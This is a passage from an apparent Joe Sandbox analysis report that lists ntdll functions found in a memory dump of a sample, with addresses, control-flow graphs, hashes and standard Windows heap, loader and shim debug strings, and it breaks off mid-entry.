                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              • Opcode ID: 1ff7465878cd814262d6e5dbe6cd97146c3ba077adb45234a90b5938e904e4e9
                                              • Instruction ID: c4adb31b6cecb1eea26c76137e835dbcc2fcb7b6a8615cb9be04578c422dce5e
                                              • Opcode Fuzzy Hash: 1ff7465878cd814262d6e5dbe6cd97146c3ba077adb45234a90b5938e904e4e9
                                              • Instruction Fuzzy Hash: 48514874A10645AFEB20CFDCCC90A7FBBFCEB48242B618459E495CF241DAB5DA40CB64
                                              Function 36A1A670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1427 36a1a670-36a1a6e9 call 36952410 * 2 RtlDebugPrintTimes 1433 36a1a89f-36a1a8c4 call 369525b0 * 2 call 36984c30 1427->1433 1434 36a1a6ef-36a1a6fa 1427->1434 1436 36a1a724 1434->1436 1437 36a1a6fc-36a1a709 1434->1437 1441 36a1a728-36a1a734 1436->1441 1439 36a1a70b-36a1a70d 1437->1439 1440 36a1a70f-36a1a715 1437->1440 1439->1440 1443 36a1a7f3-36a1a7f5 1440->1443 1444 36a1a71b-36a1a722 1440->1444 1445 36a1a741-36a1a743 1441->1445 1447 36a1a81f-36a1a821 1443->1447 1444->1441 1448 36a1a745-36a1a747 1445->1448 1449 36a1a736-36a1a73c 1445->1449 1450 36a1a755-36a1a77d RtlDebugPrintTimes 1447->1450 1451 36a1a827-36a1a834 1447->1451 1448->1447 1453 36a1a74c-36a1a750 1449->1453 1454 36a1a73e 1449->1454 1450->1433 1463 36a1a783-36a1a7a0 RtlDebugPrintTimes 1450->1463 1456 36a1a836-36a1a843 1451->1456 1457 36a1a85a-36a1a866 1451->1457 1455 36a1a86c-36a1a86e 1453->1455 1454->1445 1455->1447 1460 36a1a845-36a1a849 1456->1460 1461 36a1a84b-36a1a851 1456->1461 1462 36a1a87b-36a1a87d 1457->1462 1460->1461 1464 36a1a857 1461->1464 1465 36a1a96b-36a1a96d 1461->1465 1466 36a1a870-36a1a876 1462->1466 1467 36a1a87f-36a1a881 1462->1467 1463->1433 1475 36a1a7a6-36a1a7cc RtlDebugPrintTimes 1463->1475 1464->1457 1468 36a1a883-36a1a889 1465->1468 1469 36a1a8c7-36a1a8cb 1466->1469 1470 36a1a878 1466->1470 1467->1468 1471 36a1a8d0-36a1a8f4 RtlDebugPrintTimes 1468->1471 1472 36a1a88b-36a1a89d RtlDebugPrintTimes 1468->1472 1474 36a1a99f-36a1a9a1 1469->1474 1470->1462 1471->1433 1479 36a1a8f6-36a1a913 RtlDebugPrintTimes 1471->1479 1472->1433 1475->1433 1480 36a1a7d2-36a1a7d4 1475->1480 1479->1433 1484 36a1a915-36a1a944 RtlDebugPrintTimes 1479->1484 1482 36a1a7f7-36a1a80a 1480->1482 1483 36a1a7d6-36a1a7e3 1480->1483 1487 36a1a817-36a1a819 1482->1487 1485 36a1a7e5-36a1a7e9 1483->1485 1486 36a1a7eb-36a1a7f1 1483->1486 1484->1433 1493 36a1a94a-36a1a94c 1484->1493 1485->1486 1486->1443 1486->1482 1488 36a1a81b-36a1a81d 1487->1488 1489 36a1a80c-36a1a812 1487->1489 1488->1447 1490 36a1a814 1489->1490 1491 36a1a868-36a1a86a 1489->1491 1490->1487 1491->1455 1494 36a1a972-36a1a985 1493->1494 1495 36a1a94e-36a1a95b 1493->1495 1498 36a1a992-36a1a994 1494->1498 1496 36a1a963-36a1a969 1495->1496 1497 36a1a95d-36a1a961 1495->1497 1496->1465 1496->1494 1497->1496 1499 36a1a987-36a1a98d 1498->1499 1500 36a1a996 1498->1500 1501 36a1a99b-36a1a99d 1499->1501 1502 36a1a98f 1499->1502 1500->1467 1501->1474 1502->1498
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: HEAP:
                                              • API String ID: 3446177414-2466845122
                                              • Opcode ID: c0f2be34aa230c2c634a133ee7bd37c502cb459bd7c3126fb45650b9ab805cf6
                                              • Instruction ID: f9d014d115dc0e913998e92f8ee06a4a47799b7165daf96824ce0a4cbc680d5b
                                              • Opcode Fuzzy Hash: c0f2be34aa230c2c634a133ee7bd37c502cb459bd7c3126fb45650b9ab805cf6
                                              • Instruction Fuzzy Hash: B9A17775A043118FE704CF28C890A1AB7E6BF88354F15456EEE45EB321EBB0ED46CB91
                                              Function 36977630 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1503 36977630-36977651 1504 36977653-3697766f call 3694e660 1503->1504 1505 3697768b-36977699 call 36984c30 1503->1505 1510 36977675-36977682 1504->1510 1511 369b4638 1504->1511 1512 36977684 1510->1512 1513 3697769a-369776a9 call 36977818 1510->1513 1515 369b463f-369b4645 1511->1515 1512->1505 1519 36977701-3697770a 1513->1519 1520 369776ab-369776c1 call 369777cd 1513->1520 1517 369776c7-369776d0 call 36977728 1515->1517 1518 369b464b-369b46b8 call 369cf290 call 36989020 RtlDebugPrintTimes BaseQueryModuleData 1515->1518 1517->1519 1528 369776d2 1517->1528 1518->1517 1535 369b46be-369b46c6 1518->1535 1523 369776d8-369776e1 1519->1523 1520->1515 1520->1517 1530 369776e3-369776f2 call 3697771b 1523->1530 1531 3697770c-3697770e 1523->1531 1528->1523 1532 369776f4-369776f6 1530->1532 1531->1532 1537 36977710-36977719 1532->1537 1538 369776f8-369776fa 1532->1538 1535->1517 1539 369b46cc-369b46d3 1535->1539 1537->1538 1538->1512 1540 369776fc 1538->1540 1539->1517 1542 369b46d9-369b46e4 1539->1542 1541 369b47be-369b47d0 call 36982c50 1540->1541 1541->1512 1544 369b46ea-369b4723 call 369cf290 call 3698aaa0 1542->1544 1545 369b47b9 call 36984d48 1542->1545 1552 369b473b-369b476b call 369cf290 1544->1552 1553 369b4725-369b4736 call 369cf290 1544->1553 1545->1541 1552->1517 1558 369b4771-369b477f call 3698a770 1552->1558 1553->1519 1561 369b4781-369b4783 1558->1561 1562 369b4786-369b47a3 call 369cf290 call 369bcf9e 1558->1562 1561->1562 1562->1517 1567 369b47a9-369b47b2 1562->1567 1567->1558 1568 369b47b4 1567->1568 1568->1517
                                              Strings
                                              • Execute=1, xrefs: 369B4713
                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 369B46FC
                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 369B4725
                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 369B4655
                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 369B4787
                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 369B4742
                                              • ExecuteOptions, xrefs: 369B46A0
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                              • API String ID: 0-484625025
                                              • Opcode ID: 58ea6bba327d447ee24069f98b03b9e7329150763e6b42d4df9e26625f7a1d07
                                              • Instruction ID: c2ac55a2ed4c2d03c888bbf9e4e399301dc40133ad079d3ed51035da9947cf3b
                                              • Opcode Fuzzy Hash: 58ea6bba327d447ee24069f98b03b9e7329150763e6b42d4df9e26625f7a1d07
                                              • Instruction Fuzzy Hash: 08514B75A00319BAEF10DAA5DC89FAA77ACEF04344F5000E9D604AB185EB71DF41CF62
                                              Function 3695A250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                              Download Yara Rule
                                              Strings
                                              • SsHd, xrefs: 3695A3E4
                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 369A79D0, 369A79F5
                                              • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 369A7AE6
                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 369A79D5
                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 369A79FA
                                              • Actx , xrefs: 369A7A0C, 369A7A73
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                              • API String ID: 0-1988757188
                                              • Opcode ID: b7b6eead1427232db2c21f6a9be8803b38575202da49796a06df769f62814ee6
                                              • Instruction ID: 7dd0d6e06ede4ae95de7726eb28ee714251b872764226c25768c0264c3f0bcf8
                                              • Opcode Fuzzy Hash: b7b6eead1427232db2c21f6a9be8803b38575202da49796a06df769f62814ee6
                                              • Instruction Fuzzy Hash: 27E1D574A043028FE710CF25C894B1B77E5BB84368F624A2DFA55CB290DB71DD45CB86
                                              Function 3695D770 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 369A9341, 369A9366
                                              • GsHd, xrefs: 3695D874
                                              • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 369A9565
                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 369A9346
                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 369A936B
                                              • Actx , xrefs: 369A9508
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                              • API String ID: 3446177414-2196497285
                                              • Opcode ID: a5b38212b517f9a4f16aab29b4b3ffb89363aa188227aba17fa617c2e4a48a79
                                              • Instruction ID: 32c5950657286a69e45b24ce2eddb671fa3bd10a513b177f495e2d97803b3ccf
                                              • Opcode Fuzzy Hash: a5b38212b517f9a4f16aab29b4b3ffb89363aa188227aba17fa617c2e4a48a79
                                              • Instruction Fuzzy Hash: 1FE1E374A143028FE710CF55C890B5AB7F8FF88358F614A2DEA95CB281DB31D948CB86
                                              Function 3693645D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlDebugPrintTimes.NTDLL ref: 3693656C
                                                • Part of subcall function 369365B5: RtlDebugPrintTimes.NTDLL ref: 36936664
                                                • Part of subcall function 369365B5: RtlDebugPrintTimes.NTDLL ref: 369366AF
                                              Strings
                                              • Loading the shim user DLL failed with status 0x%08lx, xrefs: 36999A2A
                                              • apphelp.dll, xrefs: 36936496
                                              • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 369999ED
                                              • Getting the shim user exports failed with status 0x%08lx, xrefs: 36999A01
                                              • minkernel\ntdll\ldrinit.c, xrefs: 36999A11, 36999A3A
                                              • LdrpInitShimEngine, xrefs: 369999F4, 36999A07, 36999A30
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-204845295
                                              • Opcode ID: b9b95783c99a21069cdd81754670e1832f9c128678fddec5f9dd65ba466b8698
                                              • Instruction ID: eb3249d54b21e203fb2ca91141958462c3be4408566ca5e0a8d40a476d88cd73
                                              • Opcode Fuzzy Hash: b9b95783c99a21069cdd81754670e1832f9c128678fddec5f9dd65ba466b8698
                                              • Instruction Fuzzy Hash: DB51B171A093089FE320CF24CC51B9B77EDEB84794F640919F685AB1A1EA30DD05CB97
                                              Function 369BFD82 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                              • API String ID: 3446177414-4227709934
                                              • Opcode ID: 051d2f3d12baf15e0e7f4e34f721d3da759ad865a081c6c019f09d766f877254
                                              • Instruction ID: 9903c6333455cbf56375e52db06f07b1fa67ab5e0eb1b578988ed6f79614db8f
                                              • Opcode Fuzzy Hash: 051d2f3d12baf15e0e7f4e34f721d3da759ad865a081c6c019f09d766f877254
                                              • Instruction Fuzzy Hash: 26414DB9D00209AFDF01DFD9D980AEEBBB9BF48754F240159E904A7341D7319D51CBA0
                                              Function 369EFD78 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                              • API String ID: 3446177414-3492000579
                                              • Opcode ID: ec5077d69360a8f2fae3d1d37eebd7cec6cdea0ce776792a8b115900a9060fc7
                                              • Instruction ID: b5b226011a36f301a7f9ff262d6df06e3c9dd787bc2f3b36ce050503e5014e19
                                              • Opcode Fuzzy Hash: ec5077d69360a8f2fae3d1d37eebd7cec6cdea0ce776792a8b115900a9060fc7
                                              • Instruction Fuzzy Hash: 7471DF71911A84DFDB02CF68C8406ADFBF6FF4A394F25805AE541AB252C739DD42CB90
                                              Function 369365B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36999AB4
                                              • minkernel\ntdll\ldrinit.c, xrefs: 36999AC5, 36999B06
                                              • LdrpLoadShimEngine, xrefs: 36999ABB, 36999AFC
                                              • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36999AF6
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimuser$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-3589223738
                                              • Opcode ID: 62081e7653d37bc4821584994edcce435a130babae032a90e1457c881fe74ad5
                                              • Instruction ID: 84093ce7f659c9e8a45ddddae8ba2c26ef85325cc91d752ebda5b5d2c3b8dbd7
                                              • Opcode Fuzzy Hash: 62081e7653d37bc4821584994edcce435a130babae032a90e1457c881fe74ad5
                                              • Instruction Fuzzy Hash: 82512336A013589FDB04DBACCC54ADD7BFABB44388F340066E641BF296DB649C52CB91
                                              Function 3696DB00 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                              • API String ID: 3446177414-3224558752
                                              • Opcode ID: 3fa9dcefad555c38b3745accdef90041963fa1ec3121a7c14018682edce3c009
                                              • Instruction ID: 18c5e37649733915e7417e48f8e15c2c3a70557a462bc754882cc51d7af988f7
                                              • Opcode Fuzzy Hash: 3fa9dcefad555c38b3745accdef90041963fa1ec3121a7c14018682edce3c009
                                              • Instruction Fuzzy Hash: 93412375A10748DFE312CF26C884B5AB7F8EF40368F308569D5116B391CB38E985CB91
                                              Function 369EF157 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • Entry Heap Size , xrefs: 369EF26D
                                              • HEAP: , xrefs: 369EF15D
                                              • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 369EF263
                                              • ---------------------------------------, xrefs: 369EF279
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                              • API String ID: 3446177414-1102453626
                                              • Opcode ID: 8088b09614879d274aae769cb1e1fe75590e5223983f727ca9b2f34dd546c114
                                              • Instruction ID: 4c9ea9aa34de50eb28b607793ff3583d3f1e990c7f97f025d1a0e6511fa2590b
                                              • Opcode Fuzzy Hash: 8088b09614879d274aae769cb1e1fe75590e5223983f727ca9b2f34dd546c114
                                              • Instruction Fuzzy Hash: 34418D79A01215DFC706CF59C884905BBFAEF5A3D873680AAD508AB311D731EC43CBA0
                                              Function 3696DBA0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                              • API String ID: 3446177414-1222099010
                                              • Opcode ID: f800f95b6dce3df723e7b0abf1a80462dbb83d4da453a75b2e8b75f0914835d3
                                              • Instruction ID: 288a0ce59a5e82c80ee3375acc6c25c1e0d516e1b3dc22fd518ce0c9ae1b5232
                                              • Opcode Fuzzy Hash: f800f95b6dce3df723e7b0abf1a80462dbb83d4da453a75b2e8b75f0914835d3
                                              • Instruction Fuzzy Hash: 6E315935505788DFE722CB29CC09B4A7BE8EF017A8F314085E4126B652CB7CEC85CB92
                                              Function 36A16940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                              • Instruction ID: 7253a2c5bfc5bce88300d8a08c919ddfaecd743de10bfd47743d0a8390de1483
                                              • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                              • Instruction Fuzzy Hash: 9E0233B5508341AFD304CF19C990A6BBBF5EFC8714F509A2DF9898B261DB31E905CB82
                                              Function 3698B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-$0$0
                                              • API String ID: 1302938615-699404926
                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                              • Instruction ID: 8b8cf56786c6ddf3ca05fa8b0ebdff3d192f4fcb5deb564ee6b44ce186cc037e
                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                              • Instruction Fuzzy Hash: F5810378E0135A8EEF14CF65C8907EEBBB9AF45360F6C4219D870A76D9CB349840CB51
                                              Function 36949126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $$@
                                              • API String ID: 3446177414-1194432280
                                              • Opcode ID: f0028171f8a498c896145a0c276f45c7a47eb9bb45411e169de3fd173e481a79
                                              • Instruction ID: 7749c38357408bef04d3275b92179cef48332ec6a0a125db3b4094cc5ebab1ca
                                              • Opcode Fuzzy Hash: f0028171f8a498c896145a0c276f45c7a47eb9bb45411e169de3fd173e481a79
                                              • Instruction Fuzzy Hash: 8C8129B5D002699FDB21CB55CC44BDEB7B8AB08750F1041EAAA09B7240E7309E85CFA5
                                              Function 36974D1D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 369B365C
                                              • minkernel\ntdll\ldrsnap.c, xrefs: 369B3640, 369B366C
                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 369B362F
